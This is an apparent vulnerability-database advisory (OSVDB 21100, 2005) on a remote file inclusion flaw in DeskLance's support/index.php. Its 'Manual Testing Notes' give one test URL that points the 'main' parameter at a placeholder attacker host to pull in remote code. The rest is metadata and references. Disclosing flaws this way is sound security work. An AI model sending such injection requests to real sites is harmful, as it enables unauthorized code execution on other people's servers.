DeskLance index.php main Variable Remote File Inclusion

2005-11-24T17:23:11
ID OSVDB:21100
Type osvdb
Reporter OSVDB
Modified 2005-11-24T17:23:11

Description

Manual Testing Notes

http://[target]/support/index.php?main=http://[attacker]/file

References:

Vendor URL: http://www.desklance.com/ Secunia Advisory ID:17730 Related OSVDB ID: 24118 Other Advisory URL: http://pridels.blogspot.com/2005/11/desklance-vuln.html FrSIRT Advisory: ADV-2005-2575 CVE-2005-3835